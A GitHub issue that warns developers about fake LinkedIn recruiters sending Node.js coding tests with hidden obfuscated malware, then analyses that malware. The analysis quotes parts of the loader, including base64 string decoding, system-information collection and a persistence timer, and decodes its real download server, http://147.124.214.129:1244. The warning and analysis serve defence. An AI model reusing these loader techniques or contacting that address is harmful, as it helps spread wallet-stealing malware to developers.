coolcode / octotype

Web3 Vagabond
https://web3v.netlify.app
0 stars 0 forks source link

How do scammers impersonate recruiters on LinkedIn to steal applicants’ cryptocurrency wallet private keys? #2

Open coolcode opened 1 month ago

coolcode commented 1 month ago

Beware of LinkedIn Scammers Impersonating Recruiters to Steal Cryptocurrency Wallet Private Keys

Introduction

The rise of cryptocurrency has brought about incredible opportunities, but it has also attracted malicious actors looking to exploit unsuspecting individuals. A concerning trend has emerged where scammers impersonate recruiters on LinkedIn to deceive applicants and steal their cryptocurrency wallet private keys. This blog post outlines the process these attackers use to carry out their schemes and provides guidance on how to protect yourself.


The Scam Process

1. Attackers Pose as Recruiters on LinkedIn

Scammers create fake LinkedIn profiles, masquerading as recruiters from reputable companies in the tech or cryptocurrency sectors. They often use:

Their goal is to establish credibility and lure in professionals seeking new opportunities.

2. Attackers Request Completion of a Coding Test

Once contact is made, the fake recruiter expresses interest in your background and skills. They invite you to participate in a technical assessment or coding test as part of the hiring process. This seems like a standard procedure, which lowers your guard.

3. The Malicious Node.js Project

The coding test provided is a Node.js project that appears normal at first glance. However, hidden within the code is a compressed or obfuscated JavaScript script designed to:

Because the malicious code is embedded and concealed, even developers may overlook it during a casual review.

4. Attackers Drain Cryptocurrency Assets

With access to your private keys, the attackers can:

Victims often discover the theft too late, with little recourse to recover their lost assets.


How to Protect Yourself

Verify Recruiter Authenticity

Exercise Caution with Coding Tests

Protect Your Cryptocurrency Wallets

Stay Informed and Vigilant


Conclusion

The ingenuity of scammers continues to evolve alongside technology. By understanding their methods, you can better defend against their tactics. Remember that legitimate recruiters will respect your security and privacy—they will never require you to compromise your personal information or run suspicious code.

Stay cautious, protect your assets, and share this information to help others avoid falling victim to these scams.


If you have experienced or observed similar scams, consider reporting them to LinkedIn and relevant authorities to aid in the fight against cybercrime.


This code is a highly obfuscated JavaScript script whose primary function is to download an executable file or script from a remote server and execute it on the victim's computer. Here's a detailed analysis of the code:

  1. Code Obfuscation and Self-Protection:

    • The code uses numerous meaningless variable names and functions, such as E(a,b), aO, ax, etc.
    • It employs function redefinitions and loops to confuse the code logic, making it difficult to read and understand directly.
    • It hides actual string representations within encoded or calculated values through numerical and string manipulations.
  2. Dynamic Decoding and Module Loading:

    • The code uses Buffer.from() and toString() methods to decode encoded strings, such as decoding Base64-encoded strings into readable module names or file paths.
    • It dynamically loads Node.js core modules like fs (File System), os (Operating System information), path (Path handling), etc.
  3. Collecting System Information:

    • It retrieves the victim's home directory, hostname, platform type, and user information:
      hd = M['homedir'](),
      hs = M['hostname'](),
      pl = M['platform'](),
      uin = M['userInfo']();
    • This information may be used to identify the infected machine or to customize malicious behavior.
  4. Network Requests and Data Transmission:

    • The code uses the request module to send HTTP requests, potentially to communicate with the attacker's server:
      rq = require(O('cZm9ybURhdGE')),
      pt = require(O('adXJs')),
      ex = require(O('d3JpdGVGaWxlU3luYw'))[O('Z2V0')],
      zv = require(O('YcGxhdGZvcm0'));
    • It constructs an HTTP request containing the collected system information and sends it to the attacker's server.
  5. Downloading and Executing Malicious Code:

    • It constructs a download link to obtain malicious code from a remote server:
      const a0 = () => {
      let ax = 'MTQ3LjEyNCaHR0cDovLw4yMTQuMTI5OjEyNDQ=  ';
      // String manipulation and decoding to get the URL
      return Q(az) + Q(ay);
      };
    • The code saves the downloaded content to the victim's file system, typically in a hidden folder within the home directory.
    • It uses the child_process module to execute the downloaded code, which could be a reverse shell or another malicious payload.
  6. Scheduled Tasks and Persistence:

    • The code sets up a timer using setInterval to periodically execute its main malicious functions, ensuring ongoing malicious activity:
      let aw = setInterval(() => {
      (au += 1) < 3 ? av() : clearInterval(aw);
      }, 0x927c0); // Interval time is 0x927c0 (600,000 milliseconds, i.e., 10 minutes)

Summary:

The primary purpose of this code is to download and execute remote malicious code on the victim's computer, potentially for:

Recommendations:


Analysis of the Download URL:

The code constructs a download URL in a highly obfuscated manner. Here's the step-by-step analysis:

  1. Locating the Function that Builds the Download URL:

    const a0 = () => {
     let ax = 'MTQ3LjEyNCaHR0cDovLw4yMTQuMTI5OjEyNDQ=  ';
     for (var ay = '', az = '', aA = '', aB = '', aC = 0x0; aC < 0xa; aC++) {
       ay += ax[aC];
       az += ax[0xa + aC];
       aA += ax[0x14 + aC];
       aB += ax[0x1e + aC];
     }
     return (ay = ay + aA + aB), Q(az) + Q(ay);
    };
  2. Parsing the String Segments:

    • Initial String: ax = 'MTQ3LjEyNCaHR0cDovLw4yMTQuMTI5OjEyNDQ= ';
    • Splitting the String:
      • ay: Takes 10 characters starting from ax[0].
      • az: Takes 10 characters starting from ax[10].
      • aA: Takes 10 characters starting from ax[20].
      • aB: Takes 10 characters starting from ax[30].
    • Combining Strings:
      • ay = ay + aA + aB;
      • The resulting ay and az are then passed to the function Q for decoding.
  3. Function Q and Decoding:

    const Q = (ax) => Buffer.from(ax, 'base64').toString('utf8');
    • This function decodes a Base64-encoded string into a UTF-8 string.
  4. Decoding Process:

    • Extracted Strings:
      • az = 'aHR0cDovLw'; // Base64 encoded string
      • ay = 'MTQ3LjEyNC4yMTQuMTI5OjEyNDQ='; // Base64 encoded string (note the padding '=')
    • Decoding:
      • Q(az) decodes to 'http://'.
      • Q(ay) decodes to '147.124.214.129:1244'.
  5. Constructing the Download URL:

    • Combining the decoded strings:
      const downloadUrl = Q(az) + Q(ay);
      // downloadUrl = 'http://' + '147.124.214.129:1244';
    • The final download URL is:
      http://147.124.214.129:1244

Summary:

Recommendations:


Please Note: Interacting with or analyzing malicious code should be done with caution and preferably within a secure, isolated environment (like a virtual machine) to prevent unintended consequences.

coolcode commented 1 month ago

Looks good to me